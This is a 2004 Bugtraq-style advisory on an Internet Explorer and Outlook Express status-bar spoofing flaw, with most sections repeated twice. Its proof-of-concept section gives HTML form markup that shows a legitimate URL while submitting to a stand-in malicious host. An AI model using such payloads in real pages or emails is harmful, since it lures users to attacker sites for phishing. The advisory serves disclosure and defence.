Microsoft Internet Explorer HTML Form Status Bar Misrepresentation Vulnerability
BID:10023
Info
Microsoft Internet Explorer HTML Form Status Bar Misrepresentation Vulnerability
| Bugtraq ID: | 10023 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 31 2004 12:00AM |
| Updated: | Mar 31 2004 12:00AM |
| Credit: | Discovery is credited to [email protected] <[email protected]>. |
| Vulnerable: |
Microsoft Outlook Express 6.0 Microsoft Outlook 2003 0 Microsoft Internet Explorer 6.0 SP2 - do not use Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 |
| Not Vulnerable: | |
Discussion
Microsoft Internet Explorer HTML Form Status Bar Misrepresentation Vulnerability
A vulnerability has been identified in Microsoft Internet Explorer that allows an attacker to misrepresent the status bar in the browser, allowing vulnerable users to be mislead into following a link to a malicious site.
The issue presents itself when an attacker creates an HTML form with the submit 'value' property set to a legitimate site and the 'action' property set to the attacker-specified site. The malicious form could also be embedded in a link using the HTML Anchor tag and specifying the legitimate site as the 'href' property. This could aid in exploitation of other known browser vulnerabilities as the attacker now has a means to surreptitiously lure a victim user to a malicious site.
Microsoft Internet Explorer is vulnerable to this issue, however, Microsoft Outlook Express can used to carry out a successful attack as well since it relies on Internet Explorer to interpret HTML. It should also be noted that although HTML content is rendered in the Restricted Zone in Outlook Express, limiting the use of many HTML and DHTML tags, forms are still permitted. This vulnerability would most likely be exploited through HTML e-mail, though other attack vectors exist such as HTML injection attacks in third-party web applications.
The issue is reported to affect Internet Explorer 6 and Outlook Express 6. Other releases could also be affected.
A vulnerability has been identified in Microsoft Internet Explorer that allows an attacker to misrepresent the status bar in the browser, allowing vulnerable users to be mislead into following a link to a malicious site.
The issue presents itself when an attacker creates an HTML form with the submit 'value' property set to a legitimate site and the 'action' property set to the attacker-specified site. The malicious form could also be embedded in a link using the HTML Anchor tag and specifying the legitimate site as the 'href' property. This could aid in exploitation of other known browser vulnerabilities as the attacker now has a means to surreptitiously lure a victim user to a malicious site.
Microsoft Internet Explorer is vulnerable to this issue, however, Microsoft Outlook Express can used to carry out a successful attack as well since it relies on Internet Explorer to interpret HTML. It should also be noted that although HTML content is rendered in the Restricted Zone in Outlook Express, limiting the use of many HTML and DHTML tags, forms are still permitted. This vulnerability would most likely be exploited through HTML e-mail, though other attack vectors exist such as HTML injection attacks in third-party web applications.
The issue is reported to affect Internet Explorer 6 and Outlook Express 6. Other releases could also be affected.
Exploit / POC
Microsoft Internet Explorer HTML Form Status Bar Misrepresentation Vulnerability
The following proof of concepts have been provided:
<A
href="http://www.example.com">
<FORM action=http://www.malicious.com/t-bill.html method=get>
<INPUT style="BORDER-RIGHT: 0pt;
BORDER-TOP: 0pt; FONT-SIZE: 10pt; BORDER-LEFT: 0pt; CURSOR:
hand; COLOR:
blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR: transparent;
TEXT-DECORATION: underline" type=submit
value=http://www.example.com>
</A>
<form action="http://www.malicious.com/" method="get">
<a href="http://www.example.com/"><input type="image" src="http://images.example.com/title.gif"></a>
</form>
The following proof of concepts have been provided:
<A
href="http://www.example.com">
<FORM action=http://www.malicious.com/t-bill.html method=get>
<INPUT style="BORDER-RIGHT: 0pt;
BORDER-TOP: 0pt; FONT-SIZE: 10pt; BORDER-LEFT: 0pt; CURSOR:
hand; COLOR:
blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR: transparent;
TEXT-DECORATION: underline" type=submit
value=http://www.example.com>
</A>
<form action="http://www.malicious.com/" method="get">
<a href="http://www.example.com/"><input type="image" src="http://images.example.com/title.gif"></a>
</form>
Solution / Fix
Microsoft Internet Explorer HTML Form Status Bar Misrepresentation Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Microsoft Internet Explorer HTML Form Status Bar Misrepresentation Vulnerability
References:
References: